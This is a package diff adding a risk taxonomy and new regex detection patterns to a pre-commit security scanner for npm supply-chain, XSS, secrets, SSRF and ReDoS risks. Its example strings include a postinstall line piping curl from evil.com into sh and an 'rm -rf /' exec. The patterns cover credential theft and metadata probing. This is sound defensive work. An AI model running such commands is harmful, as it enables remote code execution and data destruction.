@archpublicwebsite/eslint-config 1.0.16 → 1.0.19

package/tools/security/patterns.mjs

@@ -5,6 +5,9 @@
  * vector observed in npm supply-chain incidents (event-stream, ua-parser-js,
  * node-ipc, polyfill.io, XZ Utils, etc.).
  *
+ * Risk categories (id → OWASP / MITRE ATLAS mapping) are defined in risks.mjs.
+ * Each pattern's `category` field references one of those ids.
+ *
  * Patterns are kept as non-global RegExp so they can safely be re-tested
  * across lines without needing to reset `lastIndex`.
  */
@@ -29,18 +32,21 @@ export const FILE_PATTERNS = [
     severity: 'critical',
     message: 'eval() executes arbitrary strings — primary vector for malware delivery',
     regex: /\beval\s*\(/,
+    category: 'code-execution',
   },
   {
     id: 'no-new-func',
     severity: 'critical',
     message: 'new Function() executes arbitrary strings — equivalent to eval()',
     regex: /\bnew\s+Function\s*\(/,
+    category: 'code-execution',
   },
   {
     id: 'no-implied-eval',
     severity: 'high',
     message: 'setTimeout/setInterval with a string argument executes code dynamically',
     regex: /\b(?:setTimeout|setInterval)\s*\(\s*['"]/,
+    category: 'code-execution',
   },
 
   // ── Payload delivery & obfuscation ────────────────────────────────────────
@@ -49,36 +55,28 @@ export const FILE_PATTERNS = [
     severity: 'high',
     message: 'Buffer.from(…, "base64") — frequently used to hide malicious payloads',
     regex: /Buffer\.from\s*\([^)]*,\s*['"]base64['"]\)/,
+    category: 'obfuscation',
   },
   {
     id: 'atob-usage',
     severity: 'medium',
     message: 'atob() decodes base64 — verify it is not decoding a hidden payload',
     regex: /\batob\s*\(/,
+    category: 'obfuscation',
   },
   {
     id: 'charcode-obfuscation',
     severity: 'high',
     message: 'String.fromCharCode sequence — common technique to obfuscate malicious strings',
     regex: /String\.fromCharCode\s*\(\s*(?:\d+\s*,\s*){4,}\d+\s*\)/,
-  },
-  {
-    id: 'unicode-bidi-control',
-    severity: 'critical',
-    message: 'Unicode bidi control characters detected — hidden code/trick rendering attack (Trojan Source)',
-    regex: /[\u202A-\u202E\u2066-\u2069]/,
-  },
-  {
-    id: 'zero-width-hidden-char',
-    severity: 'high',
-    message: 'Zero-width/invisible Unicode characters detected — possible hidden payload marker',
-    regex: /[\u200B-\u200D\uFEFF]/,
+    category: 'obfuscation',
   },
   {
     id: 'hex-string-obfuscation',
     severity: 'high',
     message: 'Dense hex-encoded string — possible obfuscated payload',
     regex: /['"](?:\\x[0-9a-fA-F]{2}){20,}['"]/,
+    category: 'obfuscation',
   },
 
   // ── Dangerous imports in build / config context ───────────────────────────
@@ -89,20 +87,15 @@ export const FILE_PATTERNS = [
     message: 'child_process in build config — potential command-execution backdoor',
     regex: /require\s*\(\s*['"](?:node:)?child_process['"]\s*\)|from\s+['"](?:node:)?child_process['"]/,
     configOnly: true,
+    category: 'data-exfiltration',
   },
   {
-    id: 'http-in-config-require',
+    id: 'http-in-config',
     severity: 'critical',
     message: 'HTTP/HTTPS module in build config — potential data-exfiltration vector',
-    regex: /require\s*\(\s*['"](?:node:)?https?['"]\s*\)/,
-    configOnly: true,
-  },
-  {
-    id: 'http-in-config-import',
-    severity: 'critical',
-    message: 'HTTP/HTTPS module in build config — potential data-exfiltration vector',
-    regex: /from\s+['"](?:node:)?https?['"]/,
+    regex: /require\s*\(\s*['"](?:node:)?https?['"]\s*\)|from\s+['"](?:node:)?https?['"]/,
     configOnly: true,
+    category: 'data-exfiltration',
   },
   {
     id: 'dns-in-config',
@@ -110,6 +103,7 @@ export const FILE_PATTERNS = [
     message: 'DNS module in build config — potential exfiltration via DNS tunnelling',
     regex: /require\s*\(\s*['"](?:node:)?dns['"]\s*\)|from\s+['"](?:node:)?dns['"]/,
     configOnly: true,
+    category: 'data-exfiltration',
   },
   {
     id: 'net-in-config',
@@ -117,6 +111,7 @@ export const FILE_PATTERNS = [
     message: 'net/socket module in build config — potential reverse-shell vector',
     regex: /require\s*\(\s*['"](?:node:)?net['"]\s*\)|from\s+['"](?:node:)?net['"]/,
     configOnly: true,
+    category: 'data-exfiltration',
   },
 
   // ── Prototype pollution ────────────────────────────────────────────────────
@@ -125,6 +120,7 @@ export const FILE_PATTERNS = [
     severity: 'high',
     message: 'Prototype pollution pattern — can escalate to RCE in some server runtimes',
     regex: /\.__proto__\s*=|Object\.prototype\s*\[|constructor\s*\.\s*prototype\s*\[/,
+    category: 'prototype-pollution',
   },
 
   // ── Suspicious dynamic import ──────────────────────────────────────────────
@@ -183,44 +179,172 @@ export const FILE_PATTERNS = [
     id: 'function-constructor-via-array',
     severity: 'critical',
     message: 'Function constructor accessed via decoded array — used to run hidden payload without calling new Function() directly',
-    // Generalised: identifier assigned from decoded array accessor, then invoked.
-    regex: /=\s*\w+\s*\[\s*\w+\s*\]\s*;.{0,80}\w+\s*\(\s*\w+\s*,\s*\w+\s*\(\s*\w+\s*\)\s*\)/,
+    // Matches: var x = sfL[EKc]  where the array was built from a string decoder
+    // Generalised: identifier assigned from identifier[short-identifier] then called as a function
+    regex: /=\s*\w{2,5}\s*\[\s*\w{2,5}\s*\]\s*;[^;]{0,60}=\s*\w{2,5}\s*\(\s*\w+\s*,\s*\w{2,5}\s*\(\s*\w+\s*\)\s*\)/,
   },
   {
-    id: 'global-bracket-assignment-index',
+    id: 'global-bracket-assignment',
     severity: 'high',
     message: 'global[variable] assignment — indirect global mutation used to smuggle require/module references',
-    regex: /global\s*\[\s*[\w$]+\s*\[\s*\d+\s*\]\s*\]\s*=/,
+    // Matches: global[anyVar[index]] = ...  OR  global['key'] = ...  OR  global[variable] = ...
+    regex: /global\s*\[\s*(?:[\w$]+\s*\[\s*\d+\s*\]|['"][^'"]{1,40}['"]|[\w$]+)\s*\]\s*=/,
   },
   {
-    id: 'global-bracket-assignment-string',
+    id: 'module-global-hijack',
+    severity: 'critical',
+    message: 'global[...] = module — dropper technique to expose Node module reference as a global',
+    regex: /global\s*\[.*?\]\s*=\s*module\b/,
+    category: 'code-execution',
+  },
+
+  // ── XSS / DOM injection ────────────────────────────────────────────────────
+  // These patterns cover the most common DOM-based XSS sinks. Using them with
+  // unsanitised user input allows an attacker to execute scripts in the
+  // victim's browser. ESLint rules in eslint.config.mjs cover the same
+  // vectors statically; these patterns catch them in staged files.
+  {
+    id: 'dom-innerhtml',
     severity: 'high',
-    message: 'global[variable] assignment — indirect global mutation used to smuggle require/module references',
-    regex: /global\s*\[\s*['"][^'"]{1,40}['"]\s*\]\s*=/,
+    message: 'innerHTML / outerHTML assignment — direct DOM XSS sink; use textContent or a sanitiser',
+    regex: /\.\s*(?:inner|outer)HTML\s*=/,
+    category: 'xss',
   },
   {
-    id: 'global-bracket-assignment-var',
+    id: 'dom-insertadjacenthtml',
     severity: 'high',
-    message: 'global[variable] assignment — indirect global mutation used to smuggle require/module references',
-    regex: /global\s*\[\s*[\w$]+\s*\]\s*=/,
+    message: 'insertAdjacentHTML() — DOM XSS sink; use insertAdjacentText() or sanitise input first',
+    regex: /\.insertAdjacentHTML\s*\(/,
+    category: 'xss',
   },
   {
-    id: 'module-global-hijack',
+    id: 'dom-document-write',
+    severity: 'high',
+    message: 'document.write() / document.writeln() — deprecated and a direct XSS sink',
+    regex: /document\s*\.\s*write(?:ln)?\s*\(/,
+    category: 'xss',
+  },
+  {
+    id: 'dom-srcdoc',
+    severity: 'medium',
+    message: 'srcdoc attribute set via JS — can execute scripts inside an iframe without CSP',
+    regex: /\.srcdoc\s*=/,
+    category: 'xss',
+  },
+  {
+    id: 'vue-v-html',
+    severity: 'high',
+    message: 'v-html directive — renders raw HTML; XSS risk if bound to user-controlled data',
+    // Matches both :v-html and v-html= in .vue template strings captured in JS
+    regex: /v-html\s*=/,
+    category: 'xss',
+  },
+
+  // ── Hardcoded secrets / credentials ───────────────────────────────────────
+  // Secrets committed to source control are frequently scraped by automated
+  // bots (GitHub secret scanning, truffleHog, etc.) within minutes.
+  {
+    id: 'hardcoded-openai-key',
     severity: 'critical',
-    message: 'global[...] = module — dropper technique to expose Node module reference as a global',
-    regex: /global\s*\[.*?\]\s*=\s*module\b/,
+    message: 'Hardcoded OpenAI API key detected — rotate immediately and use environment variables',
+    regex: /['"]sk-[A-Za-z0-9]{20,}['"]/,
+    category: 'hardcoded-secret',
+  },
+  {
+    id: 'hardcoded-anthropic-key',
+    severity: 'critical',
+    message: 'Hardcoded Anthropic API key detected — rotate immediately and use environment variables',
+    regex: /['"]sk-ant-[A-Za-z0-9\-_]{20,}['"]/,
+    category: 'hardcoded-secret',
   },
   {
-    id: 'define-property-backdoor-getter',
+    id: 'hardcoded-aws-key',
     severity: 'critical',
-    message: 'Object.defineProperty used to define hidden getter/setter/value with dynamic execution — potential backdoor',
-    regex: /Object\.defineProperty\s*\([^)]*\b(?:get|set)\s*:\s*(?:function|\([^)]*\)\s*=>)/,
+    message: 'Hardcoded AWS Access Key ID — rotate immediately; AWS bots can detect and exploit within minutes',
+    regex: /['"]AKIA[0-9A-Z]{16}['"]/,
+    category: 'hardcoded-secret',
   },
   {
-    id: 'define-property-backdoor-value',
+    id: 'hardcoded-github-token',
     severity: 'critical',
-    message: 'Object.defineProperty used to define hidden getter/setter/value with dynamic execution — potential backdoor',
-    regex: /Object\.defineProperty\s*\([^)]*\bvalue\s*:\s*(?:eval\s*\(|new\s+Function\s*\(|require\s*\()/,
+    message: 'Hardcoded GitHub token — rotate immediately and store in a secret manager',
+    regex: /['"]gh[pousr]_[A-Za-z0-9]{36,}['"]/,
+    category: 'hardcoded-secret',
+  },
+  {
+    id: 'hardcoded-jwt-secret',
+    severity: 'high',
+    message: 'Possible hardcoded JWT secret — use a cryptographically random secret from env vars',
+    // Matches: secret: "...", jwtSecret: "...", JWT_SECRET = "..."  with a non-trivial value
+    regex: /(?:jwt[_-]?secret|token[_-]?secret)\s*[=:]\s*['"][^'"]{8,}['"]/i,
+    category: 'hardcoded-secret',
+  },
+  {
+    id: 'hardcoded-private-key',
+    severity: 'critical',
+    message: 'Private key material in source — never commit private keys; use a secrets manager',
+    regex: /-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----/,
+    category: 'hardcoded-secret',
+  },
+  {
+    id: 'hardcoded-password-literal',
+    severity: 'high',
+    message: 'Possible hardcoded password — use environment variables or a secrets manager',
+    // Matches: password: "abc123", PASSWORD = 'secret'  (not empty, not placeholder-like)
+    regex: /\bpassword\s*[=:]\s*['"][^'"]{4,}['"]/i,
+    category: 'hardcoded-secret',
+  },
+
+  // ── Path traversal ────────────────────────────────────────────────────────
+  {
+    id: 'path-traversal-fs',
+    severity: 'high',
+    message: 'fs operation with a variable path — validate and sanitise paths to prevent directory traversal',
+    // Flags fs.readFile/writeFile/createReadStream/unlink etc. called with a variable (not a plain string)
+    regex: /(?:readFile|writeFile|createReadStream|createWriteStream|unlink|rmdir|mkdir)\s*\(\s*(?!['"` ])[^'"`)]/,
+    category: 'path-traversal',
+  },
+  {
+    id: 'path-traversal-dotdot',
+    severity: 'critical',
+    message: 'Literal path traversal sequence (../) in source — remove or validate user-supplied path segments',
+    regex: /['"]\.\.[/\\]/,
+    category: 'path-traversal',
+  },
+
+  // ── SSRF ──────────────────────────────────────────────────────────────────
+  {
+    id: 'ssrf-fetch-variable',
+    severity: 'high',
+    message: 'fetch() / axios.get() called with a variable URL — validate URL origin to prevent SSRF',
+    // Matches fetch(variable) — not fetch("https://...") which is a literal
+    regex: /\b(?:fetch|axios\.(?:get|post|put|patch|delete|request))\s*\(\s*(?!['"` ])[^'"`)]/,
+    category: 'ssrf',
+  },
+  {
+    id: 'ssrf-cloud-metadata',
+    severity: 'critical',
+    message: 'Cloud metadata endpoint (169.254.169.254 / fd00:ec2::254) referenced in source',
+    regex: /169\.254\.169\.254|fd00:ec2::254/,
+    category: 'ssrf',
+  },
+
+  // ── ReDoS ─────────────────────────────────────────────────────────────────
+  {
+    id: 'redos-nested-quantifier',
+    severity: 'medium',
+    message: 'RegExp with nested quantifier on overlapping character class — ReDoS risk; simplify the pattern',
+    // Catches: (a+)+, (a*)*, ([a-z]+)+, ([a-zA-Z]+)*  — classic catastrophic backtracking shapes
+    regex: /\((?:\[[^\]]+\]|\\w|\\d|[a-zA-Z])[+*]\)[+*?]/,
+    category: 'redos',
+  },
+  {
+    id: 'redos-alternation-overlap',
+    severity: 'medium',
+    message: 'RegExp alternation with overlapping branches inside a quantifier — ReDoS risk',
+    // Catches: (a|aa)+, (ab|a)+ patterns where branches share prefixes
+    regex: /\([^)]{1,40}\|[^)]{1,40}\)[+*?]/,
+    category: 'redos',
   },
 ]
 
@@ -238,48 +362,70 @@ export const INSTALL_SCRIPT_PATTERNS = [
     severity: 'critical',
     message: 'Install script downloads files from the internet via curl/wget',
     regex: /\bcurl\b|\bwget\b/,
+    category: 'supply-chain',
   },
   {
     id: 'install-net-request',
     severity: 'critical',
     message: 'Install script makes HTTP requests at install time',
     regex: /require\s*\(\s*['"]https?['"]\s*\)|\.get\s*\(\s*['"]https?:\/\//,
+    category: 'supply-chain',
   },
   {
     id: 'install-base64-exec',
     severity: 'critical',
     message: 'Install script decodes base64 content — hidden payload delivery pattern',
     regex: /Buffer\.from[^)]*base64|atob\s*\(/,
+    category: 'supply-chain',
   },
   {
     id: 'install-eval',
     severity: 'critical',
     message: 'Install script calls eval() — arbitrary code execution at install time',
     regex: /\beval\s*\(/,
+    category: 'supply-chain',
   },
   {
     id: 'install-env-credential',
     severity: 'high',
     message: 'Install script reads credential/secret environment variables',
     regex: /process\.env\.(?:AWS_|GITHUB_TOKEN|NPM_TOKEN|SECRET|PASSWORD|API_KEY|PRIVATE_KEY|TOKEN)/i,
+    category: 'supply-chain',
   },
   {
     id: 'install-system-path',
     severity: 'critical',
     message: 'Install script writes to system paths — possible persistence mechanism',
     regex: /\/etc\/|\/usr\/(?:bin|local)|C:\\Windows\\|\.ssh\//,
+    category: 'supply-chain',
   },
   {
     id: 'install-exec-shell',
     severity: 'high',
     message: 'Install script spawns child processes via child_process',
     regex: /\bexecSync\s*\(|\bspawnSync\s*\(|\bexec\s*\(\s*['"]/,
+    category: 'supply-chain',
   },
   {
     id: 'install-hex-obfuscation',
     severity: 'high',
     message: 'Install script contains dense hex-encoded strings — possible obfuscated payload',
     regex: /(?:\\x[0-9a-fA-F]{2}){20,}/,
+    category: 'supply-chain',
+  },
+  {
+    id: 'install-new-function',
+    severity: 'critical',
+    message: 'Install script uses new Function() — arbitrary code execution at install time',
+    regex: /\bnew\s+Function\s*\(/,
+    category: 'supply-chain',
+  },
+  {
+    id: 'install-cloud-metadata',
+    severity: 'critical',
+    message: 'Install script probes cloud metadata endpoint (169.254.169.254) — SSRF / credential theft',
+    regex: /169\.254\.169\.254/,
+    category: 'supply-chain',
   },
 ]
 

package/tools/security/risks.mjs

@@ -0,0 +1,259 @@
+/**
+ * @archipelago/security — risk taxonomy
+ *
+ * Defines the canonical risk classification used across all security tooling
+ * in this package: the pre-commit scanner, pre-push scanner, ESLint rules,
+ * and any downstream consumers.
+ *
+ * Risk levels are aligned with:
+ *  - OWASP Risk Rating Methodology
+ *  - CVSS v3.1 severity bands
+ *  - MITRE ATLAS (AML.T*) for AI/ML supply-chain vectors
+ *
+ * Reference:
+ *  https://owasp.org/www-community/OWASP_Risk_Rating_Methodology
+ *  https://www.first.org/cvss/calculator/3.1
+ */
+
+// ─── Severity levels ──────────────────────────────────────────────────────────
+
+/**
+ * Severity → numeric score mapping (mirrors CVSS v3.1 bands).
+ * Used for sorting findings and deciding whether to block a git operation.
+ *
+ * @type {Record<string, number>}
+ */
+export const SEVERITY_SCORE = {
+  critical: 4, // CVSS 9.0 – 10.0  → block commit AND push
+  high:     3, // CVSS 7.0 – 8.9   → block commit AND push
+  medium:   2, // CVSS 4.0 – 6.9   → warn; never blocks by default
+  low:      1, // CVSS 0.1 – 3.9   → info only
+  info:     0, // Informational     → no action required
+}
+
+/**
+ * Returns true if the severity level should block a git operation.
+ * @param {string} severity
+ * @returns {boolean}
+ */
+export function isBlocking(severity) {
+  return severity === 'critical' || severity === 'high'
+}
+
+// ─── Risk categories ──────────────────────────────────────────────────────────
+
+/**
+ * Canonical risk categories with their OWASP and MITRE ATLAS mappings.
+ *
+ * Each category describes:
+ *  - id          Stable identifier used in findings and ESLint rule names
+ *  - label       Human-readable name
+ *  - owasp       OWASP Top 10 / ASVS reference (2021)
+ *  - atlas       MITRE ATLAS technique(s) — AI/ML supply-chain specific
+ *  - description What the risk is and why it matters
+ *  - examples    Concrete code patterns that fall into this category
+ *
+ * @type {Array<RiskCategory>}
+ */
+export const RISK_CATEGORIES = [
+  // ── A1: Injection (RCE / code execution) ──────────────────────────────────
+  {
+    id: 'code-execution',
+    label: 'Arbitrary Code Execution',
+    owasp: 'A03:2021 – Injection',
+    atlas: ['AML.T0051 – LLM Prompt Injection', 'AML.T0010 – ML Supply Chain Compromise'],
+    description:
+      'Code that allows an attacker to execute arbitrary instructions on the host machine. '
+      + 'Vectors include eval(), new Function(), child_process.exec(), and dynamic require().',
+    severity: 'critical',
+    examples: ['eval(userInput)', 'new Function(str)()', "exec('rm -rf /')"],
+  },
+
+  // ── A2: Cryptographic / obfuscation ───────────────────────────────────────
+  {
+    id: 'obfuscation',
+    label: 'Obfuscation / Payload Hiding',
+    owasp: 'A08:2021 – Software and Data Integrity Failures',
+    atlas: ['AML.T0010 – ML Supply Chain Compromise', 'AML.T0020 – Poison Training Data'],
+    description:
+      'Base64, hex-encoding, or shuffle-cipher patterns used to conceal malicious payloads '
+      + 'from static analysis. Characteristic of supply-chain dropper attacks (event-stream, '
+      + 'ua-parser-js, polyfill.io).',
+    severity: 'high',
+    examples: ["Buffer.from('abc', 'base64')", 'String.fromCharCode(104,101,...)', '_$_1e42[0]'],
+  },
+
+  // ── A3: Prototype pollution ────────────────────────────────────────────────
+  {
+    id: 'prototype-pollution',
+    label: 'Prototype Pollution',
+    owasp: 'A03:2021 – Injection',
+    atlas: [],
+    description:
+      'Modification of Object.prototype or constructor.prototype allows an attacker to '
+      + 'inject properties onto every object in the runtime, which can escalate to RCE '
+      + 'in some server-side Node.js frameworks.',
+    severity: 'high',
+    examples: ["obj.__proto__ = {admin: true}", "Object.prototype['x'] = fn"],
+  },
+
+  // ── A4: XSS / DOM injection ────────────────────────────────────────────────
+  {
+    id: 'xss',
+    label: 'Cross-Site Scripting (XSS)',
+    owasp: 'A03:2021 – Injection',
+    atlas: [],
+    description:
+      'Unsanitised content written to the DOM via innerHTML, outerHTML, document.write(), '
+      + 'insertAdjacentHTML(), or Vue v-html allows attackers to execute scripts in the '
+      + "victim's browser context.",
+    severity: 'high',
+    examples: ['el.innerHTML = userInput', 'document.write(data)', '<div v-html="content">'],
+  },
+
+  // ── A5: Hardcoded secrets ──────────────────────────────────────────────────
+  {
+    id: 'hardcoded-secret',
+    label: 'Hardcoded Secret / Credential',
+    owasp: 'A02:2021 – Cryptographic Failures',
+    atlas: [],
+    description:
+      'API keys, tokens, passwords, or private keys committed to source code. '
+      + 'Exposed secrets are frequently scraped from public repositories by automated bots '
+      + 'within minutes of exposure.',
+    severity: 'critical',
+    examples: ['const API_KEY = "sk-..."', 'password: "hunter2"', 'PRIVATE_KEY = "-----BEGIN RSA"'],
+  },
+
+  // ── A6: Supply-chain / install scripts ────────────────────────────────────
+  {
+    id: 'supply-chain',
+    label: 'Supply-Chain Attack',
+    owasp: 'A08:2021 – Software and Data Integrity Failures',
+    atlas: ['AML.T0010 – ML Supply Chain Compromise', 'AML.T0020 – Poison Training Data'],
+    description:
+      'Malicious code injected via npm package install scripts (preinstall/postinstall), '
+      + 'typosquatted package names, or compromised transitive dependencies. '
+      + 'Covers curl/wget downloads, base64 exec, and credential theft at install time.',
+    severity: 'critical',
+    examples: ['postinstall: "curl http://evil.com | sh"', 'require("logify-utils") // typosquat'],
+  },
+
+  // ── A7: Path traversal ────────────────────────────────────────────────────
+  {
+    id: 'path-traversal',
+    label: 'Path Traversal',
+    owasp: 'A01:2021 – Broken Access Control',
+    atlas: [],
+    description:
+      'User-controlled input used in file-system operations without sanitisation. '
+      + 'Allows attackers to read, write, or delete files outside the intended directory '
+      + "(e.g., reading /etc/passwd via '../../etc/passwd').",
+    severity: 'high',
+    examples: ['fs.readFile(req.params.file)', "path.join(base, '../../../etc/passwd')"],
+  },
+
+  // ── A8: SSRF ──────────────────────────────────────────────────────────────
+  {
+    id: 'ssrf',
+    label: 'Server-Side Request Forgery (SSRF)',
+    owasp: 'A10:2021 – Server-Side Request Forgery',
+    atlas: [],
+    description:
+      'Outbound HTTP requests made with a URL derived from user input, allowing attackers '
+      + 'to probe internal services, cloud metadata APIs (169.254.169.254), or other '
+      + 'resources not directly accessible from the internet.',
+    severity: 'high',
+    examples: ['fetch(req.body.url)', 'axios.get(userSuppliedUrl)'],
+  },
+
+  // ── A9: ReDoS ─────────────────────────────────────────────────────────────
+  {
+    id: 'redos',
+    label: 'Regular Expression Denial of Service (ReDoS)',
+    owasp: 'A06:2021 – Vulnerable and Outdated Components',
+    atlas: [],
+    description:
+      'Pathological regular expressions with nested quantifiers on overlapping character '
+      + 'classes cause catastrophic backtracking, making the Node.js event loop unresponsive. '
+      + 'User-controlled input matched against such patterns is a DoS vector.',
+    severity: 'medium',
+    examples: ['/(a+)+$/', '/([a-zA-Z]+)*/', '/(a|aa)+$/'],
+  },
+
+  // ── A10: Exfiltration in build / config context ───────────────────────────
+  {
+    id: 'data-exfiltration',
+    label: 'Data Exfiltration via Build Config',
+    owasp: 'A08:2021 – Software and Data Integrity Failures',
+    atlas: ['AML.T0024 – Exfiltration via ML Inference API'],
+    description:
+      'Network modules (http, https, dns, net) or child_process imported inside Tailwind, '
+      + 'Vite, PostCSS, or ESLint config files. Build tools are executed with elevated '
+      + 'privileges and full file-system access — making them a prime exfiltration vector.',
+    severity: 'critical',
+    examples: ["import https from 'node:https' // in tailwind.config.ts"],
+  },
+]
+
+// ─── Category lookup ──────────────────────────────────────────────────────────
+
+/**
+ * Fast lookup: risk category id → category object.
+ * @type {Map<string, RiskCategory>}
+ */
+export const RISK_CATEGORY_MAP = new Map(RISK_CATEGORIES.map(c => [c.id, c]))
+
+/**
+ * Return a risk category by id, or undefined if not found.
+ * @param {string} id
+ * @returns {RiskCategory|undefined}
+ */
+export function getRiskCategory(id) {
+  return RISK_CATEGORY_MAP.get(id)
+}
+
+// ─── Finding helpers ──────────────────────────────────────────────────────────
+
+/**
+ * Sort findings by severity (critical first) and then by file path.
+ * @template {{ severity: string, file?: string, pkg?: string }} T
+ * @param {T[]} findings
+ * @returns {T[]}
+ */
+export function sortFindings(findings) {
+  return [...findings].sort((a, b) => {
+    const scoreDiff = (SEVERITY_SCORE[b.severity] ?? 0) - (SEVERITY_SCORE[a.severity] ?? 0)
+    if (scoreDiff !== 0) return scoreDiff
+    const aKey = a.file ?? a.pkg ?? ''
+    const bKey = b.file ?? b.pkg ?? ''
+    return aKey.localeCompare(bKey)
+  })
+}
+
+/**
+ * Partition findings into blocking (critical/high) and warning (medium/low/info) groups.
+ * @template {{ severity: string }} T
+ * @param {T[]} findings
+ * @returns {{ blocking: T[], warnings: T[] }}
+ */
+export function partitionFindings(findings) {
+  return {
+    blocking: findings.filter(f => isBlocking(f.severity)),
+    warnings: findings.filter(f => !isBlocking(f.severity)),
+  }
+}
+
+// ─── JSDoc typedef (for editor tooling) ──────────────────────────────────────
+
+/**
+ * @typedef {{
+ *   id: string,
+ *   label: string,
+ *   owasp: string,
+ *   atlas: string[],
+ *   description: string,
+ *   severity: 'critical'|'high'|'medium'|'low'|'info',
+ *   examples: string[],
+ * }} RiskCategory
+ */